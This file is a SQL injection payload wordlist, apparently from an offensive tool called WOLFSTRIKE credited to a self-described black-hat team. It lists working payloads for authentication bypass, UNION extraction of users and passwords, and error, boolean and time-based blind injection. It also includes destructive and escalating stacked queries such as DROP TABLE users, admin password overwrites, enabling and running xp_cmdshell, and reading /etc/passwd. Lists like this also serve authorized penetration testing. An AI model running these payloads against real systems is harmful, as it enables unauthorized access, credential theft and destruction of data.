# wordlists/sqli_payloads.txt
# WOLFSTRIKE SQL Injection Payloads
# Author: ATHEX BLACK HAT | Team: Wolf Intelligence PK
# Categories: Auth Bypass, Union, Error, Boolean, Time, Stacked

# === AUTHENTICATION BYPASS ===
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
' OR 1=1--
' OR 1=1/*
' OR 1=1#
admin' --
admin' #
admin'/*
administrator' --
' OR ''='
' OR 1=1 OR ''='
'=' 'OR' 1=1
') OR ('1'='1
' OR '1'='1' LIMIT 1--
' OR '1'='1' AND id=1--
' OR '1'='2' OR '1'='1

# === UNION BASED PAYLOADS ===
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT group_concat(column_name),NULL FROM information_schema.columns WHERE table_schema=database()--

# === ERROR BASED PAYLOADS ===
' AND extractvalue(1,concat(0x7e,database()))--
' AND extractvalue(1,concat(0x7e,version()))--
' AND extractvalue(1,concat(0x7e,user()))--
' AND updatexml(1,concat(0x7e,database()),1)--
' AND updatexml(1,concat(0x7e,version()),1)--
' AND updatexml(1,concat(0x7e,user()),1)--
' AND 1=convert(int,database())--
' AND 1=convert(int,db_name())--
' AND 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--
' AND 1=utl_inaddr.get_host_name((select banner from v$version where rownum=1))--

# === BOOLEAN BASED PAYLOADS ===
' AND 1=1--
' AND 1=2--
' AND 'a'='a' --
' AND 'a'='b' --
' AND SUBSTRING(database(),1,1)='a'--
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)=1--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--

# === TIME BASED PAYLOADS ===
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
'; WAITFOR DELAY '0:0:5'--
'; IF(SUBSTRING(db_name(),1,1)='a') WAITFOR DELAY '0:0:5'--
'; SELECT CASE WHEN (SUBSTRING(current_database(),1,1)='a') THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
' RLIKE (SELECT (CASE WHEN (1=1) THEN 0x28 ELSE 0x41 END)) AND 'x'='x

# === STACKED QUERIES ===
'; DROP TABLE users--
'; INSERT INTO users(username,password) VALUES('hacker','password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
'; DELETE FROM users WHERE username='admin'--
'; CREATE TABLE hacked(id int)--
'; ALTER TABLE users ADD COLUMN hacked varchar(100)--
'; EXEC xp_cmdshell('whoami')--
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE--

# === DATABASE SPECIFIC ===
# MySQL
' UNION SELECT @@version,@@datadir--
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
# MSSQL
' UNION SELECT @@version,db_name()--
'; EXEC master..xp_cmdshell 'dir'--
# PostgreSQL
' UNION SELECT version(),current_database()--
'; SELECT pg_read_file('/etc/passwd')--
# Oracle
' UNION SELECT banner,NULL FROM v$version--
' UNION SELECT table_name,NULL FROM user_tables--
# SQLite
' UNION SELECT sqlite_version(),sqlite_source_id()--
' UNION SELECT tbl_name,NULL FROM sqlite_master--

# === BLIND SQLI PAYLOADS ===
' AND 1=1 AND '1'='1
' AND 1=2 AND '1'='1
' AND '1'='1' AND '1'='1
' AND '1'='2' AND '1'='1
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- 
' AND (SELECT * FROM (SELECT(SLEEP(5)))b)--